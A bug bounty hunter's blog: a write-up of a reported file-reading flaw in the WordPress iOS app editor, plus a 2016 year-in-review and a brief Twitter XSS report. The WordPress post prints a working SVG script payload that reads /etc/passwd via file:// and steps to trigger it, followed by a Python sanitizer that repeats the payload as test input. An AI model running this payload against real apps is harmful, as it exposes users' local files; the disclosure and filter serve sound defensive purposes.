Wednesday, February 21, 2018

[RCE] Remote Code Execution in Wordpress iOS Application (version 9.3)





Hello Everyone,

This article will show you how I found a Remote Code Execution vulnerability in WordPress iOS application version 9.3 on my iPod Touch (iOS version 9.3.5).

It was a cold Thursday night, February 15, when I was looking for a good program to spend my night on. While checking HackerOne's Hacktivity page, I found some good stuff to read and noticed that WordPress had some newly disclosed reports, which motivated me to spend my night on their program.

I fired up Sublist3r to check whether there were some good subdomains to hunt. After a few hours of looking for vulnerabilities on different subdomains and directories, I hadn't found even one, so I went to my inbox and checked my previous reports to WordPress. I noticed that I had reported an issue in the WordPress iOS app a year ago.

My previous report gave me another idea, so I downloaded the WordPress iOS app again on my iPod Touch, which is stuck on iOS version 9.3.5 since Apple no longer releases updates for it. While downloading the app, the App Store said that the newest version of the app is not compatible with my iOS version, so I needed to download an older version that is compatible with my device. So I downloaded WordPress iOS app version 9.3, the version the App Store recommended for my device.

After downloading the app, I found some XSS issues but didn't report them since they were just self-XSS. After a few hours of having fun with the app, I found this Remote Code Execution vulnerability in the app's editor. Below is the proof of concept I reported to WordPress.




Proof of Concept


Hello,

I found out that the WordPress iOS application has a Remote Code Execution vulnerability when posting a blog via the iOS application.

Tested in iOS 9.3.5

Injected Payload

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg xmlns="http://www.w3.org/2000/svg">
  <script>
    // Inline script inside an SVG; the editor's web view runs it when the post body is rendered.
    function readTextFile(file)
    {
      var rawFile = new XMLHttpRequest();
      rawFile.open("GET", file, false); // synchronous request, so responseText is ready after send()
      rawFile.onreadystatechange = function ()
      {
        if (rawFile.readyState === 4)
        {
          // file:// responses report status 0 rather than 200, so both are accepted
          if (rawFile.status === 200 || rawFile.status == 0)
          {
            var allText = rawFile.responseText;
            alert(allText);
          }
        }
      }
      rawFile.send(null);
    }
    readTextFile("file:///../../../../../etc/passwd");
  </script>
</svg>



Steps
  1. Log in to your WordPress account using the WordPress iOS application
  2. Create a new blog post
  3. In the post body, tap the <> button, then input the given payload.
  4. Tap the <> button again and see the result.

I hope you will fix this issue as soon as possible.
Cheers and have a good day,

Evan
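The payload above works because the editor hands post markup to a web view with an inline SVG <script> intact. As an added example (not WordPress code), here is a server-side filter built only on Python's standard library that drops the active content such a payload relies on, inline script-like elements, on* event handlers and javascript:/file:/data: URLs, and records a finding for each removal so the submission can be logged; SAMPLE_POST, ActiveContentFilter and sanitize_post are names chosen for this example, and the sample post is constructed from the report's payload.

```python
import html
from html.parser import HTMLParser

ACTIVE_TAGS = {"script", "iframe", "object", "embed"}  # elements that execute or load code
RISKY_SCHEMES = ("javascript:", "file:", "data:")      # URL schemes rejected in attributes

SAMPLE_POST = (  # constructed sample: the report's inline-SVG payload, compacted, plus a link
    '<p>Hello &amp; welcome</p><svg xmlns="http://www.w3.org/2000/svg"><script>var x=new '
    'XMLHttpRequest();x.open("GET","file:///../../../etc/passwd",false);x.send(null);'
    'alert(x.responseText);</script></svg><a href="javascript:alert(1)" onclick="alert(2)">link</a>')

class ActiveContentFilter(HTMLParser):
    """Re-emits markup minus active elements, on* handlers and risky URLs, logging each drop."""
    def __init__(self):
        super().__init__()
        self.out, self.findings, self._skip = [], [], 0

    def _emit(self, text):  # anything inside a skipped element (e.g. a script body) is dropped
        if not self._skip:
            self.out.append(text)

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"<{tag}> element removed")
            self._skip += 1
            return
        kept = []
        for name, value in attrs:  # the parser has already decoded entities in attribute values
            if name.lower().startswith("on"):
                self.findings.append(f"{name} handler on <{tag}> removed")
            elif (value or "").strip().lower().startswith(RISKY_SCHEMES):
                self.findings.append(f"{name}={value!r} on <{tag}> removed")
            else:
                kept.append(f" {name}" if value is None else f' {name}="{html.escape(value)}"')
        self._emit(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ACTIVE_TAGS:
            self._skip = max(self._skip - 1, 0)
        else:
            self._emit(f"</{tag}>")

    def handle_data(self, data):  # text arrives decoded, so re-escape it before re-emitting
        self._emit(html.escape(data, quote=False))

def sanitize_post(markup):  # -> (clean_markup, findings) for a post body from the editor
    p = ActiveContentFilter()
    p.feed(markup)
    p.close()
    return "".join(p.out), p.findings
```

Comments, declarations and the <?xml ?> processing instruction are not re-emitted. A production sanitizer should allowlist the tags and attributes it accepts rather than denylist a few as this example does; the part worth keeping is treating every script element, handler attribute and non-http URL inside author-supplied markup as hostile before a web view renders it.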


Result






Timeline
Reported: February 15, 2018
First Response: February 15, 2018
Second Response (Marked as Needs more information): February 15, 2018
Third Response (Marked as Informative): February 21, 2018
Final Response (Hi. Sure, please feel free to publish it on your blog if you'd like.): February 21, 2018






I hope you enjoy this article.



Life is a journey that must be traveled no matter how bad the roads and accommodations. Oliver Goldsmith
Read more at: https://www.brainyquote.com/topics/journey

Monday, December 05, 2016

2016 Year in Review





Hello Everyone,


This year, I would like to end my 2016 with a Year in Review.


2016: another wonderful year in my life; lots of awesome, amazing and memorable things happened. Lots of failures, successes, etc. So, as the year comes to an end, here are the things that happened in my 2016 journey.


-----


1. Travels. Lots of traveling happened this year, although not outside of Mindanao, but still, it is one of my favorite things that I've done this year. Traveling and meeting new people and cultures is one of my main life goals.

This year, I traveled to Pagadian City, Zamboanga City, Dipolog City, Dapitan City (it was my first time in Dapitan, such a lovely place) and Baroy, Lanao Del Norte. Hopefully next year I will spend some of my bug bounty rewards on another travel adventure; I already have the list of the places that I want to go to.


Here are some of the pictures I took during my travels.

On my way to Dapitan.
Visited Gloria de Dapitan for the first time.
Chillin' at the bench inside Gloria de Dapitan with my homies
Me sitting on the wooden bench inside Jose Rizal's house (Replica)
While waiting for my name to be called at the NBI Office in Pagadian City.
On my way to Baroy, Lanao Del Norte.
Chill morning in Baroy, Lanao.
On my way home from Baroy, took this shot while in Aurora, Zamboanga Del Sur.
On my way to Zamboanga City.
Took a picture of Jose Rizal's house (Replica) in Talisay, Dapitan City.




All in all, my travel adventure this year is such a wonderful experience.


 -----


2. The bug bounty. For the past 4 years of my bug bounty career, I have learned a lot of things in the field of Information Technology, met new friends (some only on social media), earned some money without having a regular job (just the bug bounty thing), and bought some things that I wanted using my bug bounty rewards.

I started participating in the bug bounty community in mid-2013, and I have reported a lot of different security vulnerabilities to hundreds of companies since then. But in 2016, my bug bounty journey was a little bit different from the past years: I became a seasonal researcher since I couldn't manage my time for it like before. Still, this year's bug bounty journey was just another wonderful and memorable adventure.

I was acknowledged again by Microsoft, for the second time.

Twitter, for the third time ("two times for this year": 2013, 2014 and 2016) [Write-up of one of the issues I reported this year >> Here].

Discovered a critical vulnerability in Cydia [iOS] (write-up was here) but decided not to report it.

Discovered a Universal XSS in Comodo Dragon version 29.1.0.0 (write-up was here; shout out to Inti De Ceukelaire for this one).

Acknowledged and rewarded by different companies; I can't mention them all, but thank you very much to those companies, really stoked to have them become part of my 2016 bug bounty adventure.

Joined the most prestigious "Synack Red Team" community (just another dream come true for me).

Pulled out of the Bugcrowd Top 100 Security Researchers, but hopefully before this year finally ends I will be in the Top 100 again, since I made a promise to be in the Bugcrowd top 100 researchers for 4 years.

Received many bounties from different companies (thank you, bug bounty).

Just like the previous years, participated in some private and flex bug bounty programs and received bounties from them.

One of my favorite things in bug bounty, the swag: received a lot of swag from different companies.

Just like before, met new people (especially on social media); some of them became real friends, some of them are the kind of people who think a hacker is just a guy who hacks a Facebook account (HAHAHA!), and some of them are people who ask for help on how to start participating in bug bounty programs.

All in all, this year's bug bounty adventure was so hype; although it was a little bit different from the previous years, I still managed to make it another year of wonderful bug bounty adventure. Thank you to all the companies, especially Bugcrowd, HackerOne, Cobalt and my new family, the Synack Red Team; words can't describe how happy I am that you guys became part of another one of my wonderful bug bounty adventures. I hope next year's adventure will be more exciting and interesting.


-----


3. The job opportunities. Just like the previous years, I received a lot of job opportunities this year because of my bug bounty career as a security researcher, but I decided not to accept them for now, since all I want to do first is enjoy my teenage adventure and enjoy my life as a single person. Jobs are everywhere, though some say that opportunity knocks once; I'm not afraid of not accepting those opportunities that were given to me. I remember an article I read before about why the author left the company where he was working; he says on his blog that he didn't want to stick with one company or job, and all he wanted was to build his own company and learn and progress more with it.


-----


4. My adventure with my IBBRC family. As a BMXer, IBBRC (Ipil Board and Bike Riding Community) is also a big part of this year's adventure: we did a lot of filming, discovered a lot of beautiful spots in our hometown, met new friends because of riding, had lots of crashes and new tricks, and saw better progression for everyone in the team. All in all, I'm so stoked that my IBBRC family had a wonderful part in my 2016 journey; really hyped for all my friends in IBBRC.

Here are some of the projects we did this year:

We filmed a lot this year, and hopefully next year there will be more video edits.



-----


5. My music career. As an EDM producer, having a family of producers is a dream come true. This year, a friend of mine asked me to join his group of music producers (although the group is not so big, I'm happy to be part of it) so that I can promote my tracks easily with them. Although I haven't been so active in producing EDM tracks over the last few months, Virtous Music still invited me to become part of their group (the group is like a record label) and released 4 of my EDM tracks with them. Having them become part of my 2016 adventure is one of the happiest moments in my life. Thanks to my Virtous Music family.


-----


6. My Invalid Web Security (IWS) family. We shared lots of ideas, I learned a lot from my IWS family, and I'm really happy to have my IWS family become part of my 2016 adventure.



This year, I shared a lot of moments with the people I met and learned a lot from them. They motivate me to progress more in the upcoming years; really happy to have them in this year's adventure.

So, I hope you guys also enjoyed your 2016 adventure. Happy Holidays.

"The best way to pay for a lovely moment is to enjoy it." 
-Richard Bach

Monday, September 26, 2016

XSS Vulnerability in Twitter [https://twitter.com] (Write Up)






Since I successfully transferred my blog from WordPress to Blogger, to celebrate, here's a short write-up of my previous report to Twitter, for which I got a bounty of $280 from the Twitter Security team.

A few months ago, I found a Cross-Site Scripting (XSS) vulnerability in Twitter while reading and tweeting.


Proof of Concept


XSS in Twitter

This issue was reported and fixed already by Twitter Security Team.

--Timeline--

Reported: 2016-03-05
First Reply: 2016-03-07 (Twitter)
Triaged: 2016-03-09 (Twitter)
Bounty Awarded: 2016-03-12
Fixed: 2016-05-20

I hope you enjoy this article.

Thanks,
Evan - Invalid Web Security


"The most important thing is to enjoy your life, to be happy, It's all that matters."
~Audrey Hepburn